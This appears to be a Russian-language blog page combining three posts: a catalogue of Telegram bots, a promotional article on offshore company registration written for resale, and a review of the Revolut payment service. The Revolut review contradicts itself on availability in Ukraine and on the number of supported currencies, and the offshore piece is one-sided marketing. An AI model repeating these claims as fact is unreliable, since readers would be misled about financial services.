https://t.me/crosser_bot - Бот считает пересечения в каналах/чатах. Показывает твою аудиторию. Спасает от неэффективных ВП. Экономит расходы на маркетинг. Чистит от неактивных и удаленных аккаунтов.

боты для пользователей мессенджера:

https://t.me/tgvpnbot - быстрый, безопасный и безлимитный VPN для обхода различных блокировок и анонимизации деятельности в сети.
https://t.me/DrWebBot - бот антивирусник, проверяет файлы и сообщения на предмет вредоносных программ.
https://t.me/AVinfoBot - проверка продавца автомобиля по телефону владельца, гос. номеру или VIN-номеру автомобиля.
https://t.me/zdorobot - бот показывает инструкции к лекарствам, значение симптомов, позволяет заказать лекарства и др.
https://t.me/topdf_bot - конвертирует документы в pdf.
https://t.me/ya - бот яндекса, ищет любую информацию.
https://t.me/storebot - бот-магазин, топ ботов, описания.
https://t.me/Dict_bot - бот переводит слова с английского языка на русский и обратно.
https://t.me/ipgeobot - бот для определения гео локации домена или IP.
https://t.me/voicybot - бот переводит в текст люыбе аудио и голосовые сообщения.
https://t.me/MyTeleCloudBot - личное облачное хранилище в телеграмм, безлимитное и приватное.
https://t.me/Wikishbot - присылает статьи из википедии.
https://t.me/egrul_bot - умеет показывать информацию о юр. лицах и их учредителях.
https://t.me/tgchans_bot - бот-поисковик по каналам и группам Телеграмм.
https://t.me/TrafficRobot - создает анонимный почтовый ящик, который можно в любой момент удалить, все письма приходят в Телеграмм.
https://t.me/Cryptoneto_bot - самый быстрый криптоновостной бот в телеграме, оповещает о свежих новостях (по выбранной валюте) сразу после их публикации.

боты для работы с соц. сетями:

https://t.me/Soberubot - бот для парсинга списка аккаунтов подписчиков в Инстаграм.
https://t.me/hashtags_bot - подбирает хештеги по фотографии, хештеги выдает на англ. языке.
https://t.me/JoinstaBot - бесплатно накручивает лайки на любое фото в Инстаграм.
https://t.me/Instasave_bot - скачивает фото и видео с Инстаграм и YouTube.
https://t.me/izibot - бот скачивает видео из Instagram, YouTube, VK, FB и Coub.
https://t.me/pstrbot - отправляет записи из разных социальных сетей в ваши каналы.
https://t.me/junction_bot - бот собирает посты из Telegram и Twitter каналов в одну новостную ленту. Также можно использовать для трансляции каналов и других ботов в группы или в другие каналы.

боты для развлечений и досуга:

https://t.me/guggystickerbot - бот генерирует стикеры, вы пишите текст он подбирает стикер и вставляет текст.
https://t.me/tap2bot - бот ищет фильмы, торенты, авиабилеты, гостиницы, кафе.
https://t.me/freelancehelp_bot - бот который придумывает отмазки для фрилансеров.
https://t.me/guggybot - бот для постинга гифок (gif файлы).
Подробнее

Что нужно знать об оффшорах.


Что нужно знать об оффшорах.

Обзорная статья знакомит с перспективой развития оффшорных зон, тенденцией изменений в законодательстве этих. Статья идеально подойдет для сайтов компаний предоставляющих услуги по регистрации компаний в оффшорах. Высокая уникальность текста.
Текущий год принес для оффшорных зон существенные изменения. В результате давления ОЭСР и ФАТФ многие оффшорные зоны внесли в законодательство изменения, направленные на то, чтобы их финансовые рынки стали более прозрачными.
Подобные изменения коснулись Гонконга, Сейшел, Британских Виргинских островов, Кипра, Белиза, Люксембурга.
Имеют ли оффшоры перспективы?
Конечно же, да. Оффшорные зоны являются важной частью мировой экономической системы. Они помогают удерживать низкий уровень налогов в развитых государствах. Для некоторых стран оффшорный бизнес является опорой для всей экономики. Среди таких государств можно выделить Самоа, Доминика, Маршалловы острова и другие.
Ни одна международная организация не призывает к полному закрытию оффшорных зон. На сегодняшний день нет оснований полагать, что в ближайшем будущем в оффшорных зонах будут подниматься налоги или законодательство, касающихся корпоративных прав, станет жестче.
Да, тенденции свидетельствуют о том, что большинство оффшоных зон станут более прозрачными, но, скорее всего, дело ограничится более тщательной проверкой при регистрации компаний нерезидентов. В некоторых оффшорах такие изменения уже есть, но количество компаний, зарегистрированных в них, не уменьшается. Ведь выгоды все равно превышают убытки.
Таким образом, проанализировавши изменения в законодательстве оффшорных зон можно прийти к выводу, что все они направлены на противодействие отмыванию «грязных» денег. Владельцам честного бизнеса препятствия в оффшорах нет.
Какой оффшор лучше выбрать? Здесь однозначного ответа нет. Все зависит от бизнеса и целей, которые ставит перед собою владелец активов. Например, Белис и Невис являются лидерами с точки зрения защиты активов и конфиденциальности. Кредиторам получить активы из этих оффшоров нелегко. Законодательство максимально защищает интересы владельцев компаний.
Лучшим оффшором для инвестиций являются Каймановы острова. Кроме замечательного инвестиционного климата, здесь можно получить консалтинговые услуги высокого уровня.
Если вы планируете вести бизнес в странах Дальнего Востока, лучше всего создать компанию в Гонконге или Сингапуре.
Чтобы открыть компанию в оффшорной зоне вам понадобиться проштудировать законодательство многих стран, выбрать страну с наиболее подходящими для вас условиями. Обратитесь к нам, опытные консультанты помогут вам выбрать оффшор с наиболее интересными условиями и зарегистрировать компанию в этом регионе.
Подробнее
  • 0

Платежная система Revolut



Фактически Revolut, это мощный компьютер, который был запущен в 2015 году. Сначала платежная система ориентировалась на переводы, обменные операции. Сегодня услуг стало значительно больше. Можно:
• обналичивать переводы;
• совершать виртуальные покупки;
• пополнять счета в букмекерских конторах и пр.
Удобство Revolut в том, что для совершения большинства операций достаточно смартфона. Впрочем, если вы привыкли к платежной карте, эта услуга тоже доступна. Можно заказать дебетовую карту.
Revolut успешно заменяет обменник. Здесь можно обменять до 35 валют. За некоторые обменные операции комиссия не взимается вообще, для других она минимальна.
Обзор карт
Revolut предлагает два вида карт: виртуальные и физические. Платежные системы, с которыми сотрудничает оператор: Mastercard и Visa. Клиент не может выбрать одну карту из двух. Система сама выбирает в случайном порядке. Карты разделены на 3 категории: стандарт, премиум, металл тарифы. При выборе одной из двух последних, можно заказать дизайн и цвет.
Проводить операции можно с ПК, либо смартфона. Есть приложения для Android и iPhone.
Существует несколько способов пополнить карту Revolut. Лучше всего с банковской карты, так как за эту операцию комиссия не взимается. Карты Revolut принимаются везде. С их помощью можно рассчитываться на Аmazon, aliexpress и др. сайтах. Обналичить деньги получится практически в любой стране мира.
Страны, в которых работает Revolut
Платежная система работает в странах ЕС, США, Канаде, развитых странах Азии, например, в Японии.
К сожалению, сейчас в Украине Revolut недоступна. Но если вы легально работаете в одной из стран ЕС, то можно оформить на карточку платежной системы поступление заработной платы.
Также, можно переводить через Revolut переводы родственникам, которые живут в Украине. Для этого можно воспользоваться услугами партнеров Revolut. Например, Monobank. Деньги будут поступать прямо на карточку.
Кому подходит Револют
Гражданам, которые на законных основаниях находятся в ЕС, США. Пригодится она и в том случае, если вы ведете бизнес в одной из этих стран, а ваши сотрудники находятся за пределами страны, в которой зарегистрирован бизнес.
Револют подходит для многих операций. Перечисления средств со счета на счет, это лишь одно из направлений. Можно обменивать валюты, совершать платежи. Кроме этого, Revolut поможет экономить, вкладывать деньги, работать с криптовалютами, оплачивать покупки и многое другое.
К сожалению, если вы живете в Украине, России и других странах СНГ, открыть счет в этой платежной системе не получится.
Услуги Revolut
Револют существенно отличается от привычных нам банков. Платежная система больше напоминает суперкомпьютер. Тем не менее она предоставляет проводить широкий спектр банковских услуг:
• осуществлять онлайн-платежи с высокой степенью защиты;
• проводить мгновенные переводы внутри системы;
• планировать бюджет;
• автоматически откладывать сбережения;
• инвестировать в криптовалюту.
Доступны еще некоторые другие возможности.
Тарифы
На базовом тарифе обменять можно не более 1 тыс. фунтов в месяц на другую валюту без уплаты комиссии.
Если лимит превышен, сумма комиссии составит всего лишь 0,5%. Для других тарифов лимиты не устанавливаются.
При этом бесплатными остаются переводы внутри страны в евро. Одним словом, тарифы замечательные. Особенно если сравнивать их с нашими банками.
Как пополнить счет в Револют
В ЕС или США пополнить счет без проблем. Проще всего это сделать с банковской карты. Можно осуществить перевод непосредственно с банковского счета. Владельцы Айфонов могут воспользоваться услугами Apple Pay.
К сожалению, жителям СНГ придется хитрить. Находясь в Украине или России зарегистрировать аккаунт не удастся. Но если вы легально работаете за границей, можно открыть счет за рубежом.
Подробнее о Revolut
Платежная система Revolut (Револют) была запущена в июле 2015 года. Revolut позиционирует себя как прогрессивная финансовая компания, которая адаптируется под финансовые потребности пользователя вне зависимости от страны мира.

В 2019 году Revolut — это 7.000.000 пользователей по всему миру и более 350 миллионов транзакций на сумму более £40 миллиардов. Карты Revolut высылаются в большинство стран мира.
Cооснователь и гендиректор Revolut — Николай Сторонский. К лету 2020 года Revolut планирует увеличить число работников с 1,5 тысяч до 5 тысяч человек.
Тип карты
MasterCard или VISA (в зависимости от региона)
Срок действия карты
5 лет
Стоимость доставки Revolut
£4,99 (стандартная доставка);
£11,99 (экспресс-доставка);
Бесплатно для Revolut Premium.
Лимиты снятия средств в банкомате в месяц без процента
£200 — Standart
£400 — Platinum
£600 — Metal
Комиссия за снятие наличных сверх лимита
2% от суммы
Пополнение
Бесплатно для дебетовых карт

Стоимость обслуживания в месяц
£0 — Standart
£6,99 — Platinum
£12,99 — Metal
Переводы между пользователями и конвертация валюты
До £5.000 в месяц без процента
Свыше £5.000 в месяц — 0,5%
Преимущества Revolut
снятие наличных по всему миру без процента;
конвертация средств в 150 валют мира по курсу Interbank;
переводы в 29 валютах мира;
мгновенные бесплатные переводы до £5.000;
удобное мобильное приложение «Revolut»;
обмен валюты на Bitcoin, Litecoin, Ethereum, Bitcoin Cash и XRP;
удобный криптокошелёк;
безопасность (блокировка карты с мобильного приложения, защита на основе геолокации).
Карта Revolut доступна для жителей Украины, Латвии, Литвы и Эстонии Доставка в Беларусь и Россию не доступна.

Подробнее

Яндекс цитирования
Рейтинг@Mail.ru